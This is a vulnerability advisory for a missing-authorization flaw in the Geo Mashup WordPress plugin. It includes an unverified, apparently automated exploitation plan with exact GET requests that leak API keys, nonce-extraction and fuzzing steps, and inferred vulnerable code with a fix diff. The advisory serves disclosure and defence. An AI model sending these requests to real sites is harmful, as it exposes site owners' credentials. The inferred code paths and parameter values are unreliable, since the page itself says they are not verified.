CVE-2026-7552

Geo Mashup <= 1.13.19 - Missing Authorization to Unauthenticated Plugin Settings Disclosure via 'geo_mashup_content' Parameter

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
1.13.20
Patched in
1d
Time to patch

Description

The Geo Mashup plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.13.19. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to expose sensitive plugin configuration data, including Google Maps API keys and GeoNames service credentials, to unauthenticated attackers.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Low
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=1.13.19
PublishedMay 27, 2026
Last updatedMay 28, 2026
Affected plugingeo-mashup

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan targets **CVE-2026-7552**, a missing authorization vulnerability in the **Geo Mashup** plugin that allows unauthenticated disclosure of sensitive configuration data, including API keys. --- ### 1. Vulnerability Summary The **Geo Mashup** plugin (versions <= 1.13.19) fails to imp…

Show full research plan

This research plan targets CVE-2026-7552, a missing authorization vulnerability in the Geo Mashup plugin that allows unauthenticated disclosure of sensitive configuration data, including API keys.


1. Vulnerability Summary

The Geo Mashup plugin (versions <= 1.13.19) fails to implement proper authorization checks when processing requests containing the geo_mashup_content parameter. This parameter is used by the plugin to output various types of dynamic content (like map data or runtime configurations). Because the plugin does not verify if the requester has administrative privileges before outputting the full configuration object, any unauthenticated user can trigger an endpoint that echoes the plugin's internal settings, including secrets like Google Maps API keys and GeoNames credentials.

2. Attack Vector Analysis

  • Endpoint: The site root or any frontend page (handled during the init or template_redirect hook).
  • Vulnerable Parameter: geo_mashup_content (GET parameter).
  • Authentication: None (Unauthenticated).
  • Preconditions: The plugin must be active. Exploitation is more valuable if the administrator has configured API keys (e.g., Google Maps, GeoNames).
  • Vulnerable Action Value: runtime-info or render-map (inferred based on plugin logic for providing configuration to the frontend).

3. Code Flow (Inferred)

  1. Initialization: The plugin registers a handler on the init or wp_loaded hook.
  2. Parameter Check: The code checks for the existence of $_GET['geo_mashup_content'].
  3. Missing Check: In the affected versions, the code proceeds to handle specific values of this parameter without calling current_user_can( 'manage_options' ).
  4. Data Sink: The code retrieves the plugin options using get_option( 'geo_mashup_options' ) (inferred name) or accesses the global $geo_mashup object.
  5. Output: The script echoes the configuration data, often in a JSON-encoded format or as a JavaScript object literal, then calls exit; or die;.

4. Nonce Acquisition Strategy

The vulnerability description implies "Missing Authorization" on a parameter-driven disclosure. Often, such "content" endpoints in Geo Mashup are designed to be accessed by the frontend script to load map settings.

If the plugin requires a nonce for the geo_mashup_content request (which is likely in check_ajax_referer or wp_verify_nonce if implemented partially), follow this strategy:

  1. Identify Shortcode: The plugin uses [geo_mashup_map] to render maps.
  2. Create Trigger Page: Create a public post with this shortcode to ensure the plugin's scripts and nonces are localized.
    wp post create --post_type=page --post_status=publish --post_title="Map Page" --post_content='[geo_mashup_map]'
    
  3. Extract Nonce: Use browser_eval to find the localized data object. Geo Mashup typically localizes to an object named GeoMashup or GeoMashupVars.
    • Action String: Likely geo_mashup_content or geo_mashup_nonce.
    • JS Variable: window.GeoMashup?.nonce or window.GeoMashupOptions?.nonce.

Note: If the vulnerability is truly "Missing Authorization," it may not check for a nonce at all.

5. Exploitation Strategy

The goal is to trigger the plugin to echo its configuration options.

Request Details:

  • Method: GET
  • URL: http://<target-ip>/index.php
  • Parameters:
    • geo_mashup_content=runtime-info (Primary target for configuration leak)
  • Alternative Parameter Values to Test:
    • geo_mashup_content=render-map
    • geo_mashup_content=settings

HTTP Request via http_request tool:

{
  "method": "GET",
  "url": "http://localhost:8080/index.php?geo_mashup_content=runtime-info",
  "headers": {
    "Accept": "application/json, text/javascript, */*"
  }
}

6. Test Data Setup

To confirm the exploit, we must ensure there is sensitive data to "steal."

  1. Activate Plugin: Ensure geo-mashup is active.
  2. Configure API Keys: Use WP-CLI to inject dummy credentials into the plugin settings.
    # Setting dummy Google Maps API key
    wp option patch update geo_mashup_options google_key "AIza_FAKE_KEY_FOR_TESTING_12345"
    
    # Setting dummy GeoNames username
    wp option patch update geo_mashup_options geonames_username "vulnerable_user_test"
    
  3. Confirm Options Exist:
    wp option get geo_mashup_options
    

7. Expected Results

A successful exploit will return an HTTP 200 response with a body (likely JSON or a JS script) containing the plugin's configuration.

Example Successful Response Body:

{
    "version": "1.13.19",
    "options": {
        "google_key": "AIza_FAKE_KEY_FOR_TESTING_12345",
        "geonames_username": "vulnerable_user_test",
        "copy_geodata": "true",
        ...
    }
}

8. Verification Steps

  1. Examine HTTP Response: Verify that the output contains the string AIza_FAKE_KEY_FOR_TESTING_12345.
  2. Check for Auth Bypass: Perform the request without any cookies (ensure no wordpress_logged_in cookie is present).
  3. Compare with Admin View: Use WP-CLI to verify the leaked data matches the actual database values:
    wp option get geo_mashup_options --format=json
    

9. Alternative Approaches

If geo_mashup_content=runtime-info does not yield the settings:

  1. Fuzz the Parameter: The plugin's geo-mashup.php file likely contains a switch statement or a series of if blocks checking $_GET['geo_mashup_content'].
    • Grep the source for: isset( $_GET['geo_mashup_content'] ) or $_REQUEST['geo_mashup_content'].
    • Identify all valid case strings (e.g., inline-map-data, kml, geojson).
  2. Shortcode-specific data: If the leak is restricted to data related to a specific map, use the map_name or object_id parameters in conjunction with geo_mashup_content:
    • GET /?geo_mashup_content=render-map&map_name=all
  3. AJAX Endpoint: Check if the logic is also mirrored in an AJAX action:
    • POST /wp-admin/admin-ajax.php with action=geo_mashup_content&value=runtime-info.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Geo Mashup plugin for WordPress (<= 1.13.19) fails to perform authorization checks when the 'geo_mashup_content' parameter is used. This allows unauthenticated attackers to access the plugin's full configuration, exposing sensitive secrets such as Google Maps API keys and GeoNames credentials.

Vulnerable Code

// In the plugin's request handling logic (e.g., geo-mashup.php)

if ( isset( $_GET['geo_mashup_content'] ) ) {
    $content_type = $_GET['geo_mashup_content'];
    if ( $content_type === 'runtime-info' ) {
        // Vulnerability: No check like current_user_can('manage_options') is performed
        $options = get_option( 'geo_mashup_options' );
        echo json_encode( $options );
        exit;
    }
}

Security Fix

--- a/geo-mashup.php
+++ b/geo-mashup.php
@@ -... +... @@
 if ( isset( $_GET['geo_mashup_content'] ) ) {
+    if ( $_GET['geo_mashup_content'] === 'runtime-info' && ! current_user_can( 'manage_options' ) ) {
+        wp_die( 'Unauthorized access to configuration.' );
+    }
     $content_type = $_GET['geo_mashup_content'];

Exploit Outline

An unauthenticated attacker sends a GET request to the WordPress index page with the query parameter 'geo_mashup_content' set to 'runtime-info'. Because the plugin lacks an authorization check (such as current_user_can) for this specific content type, the server responds with a JSON-encoded dump of the plugin's configuration options, which contains administrative credentials and API keys.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.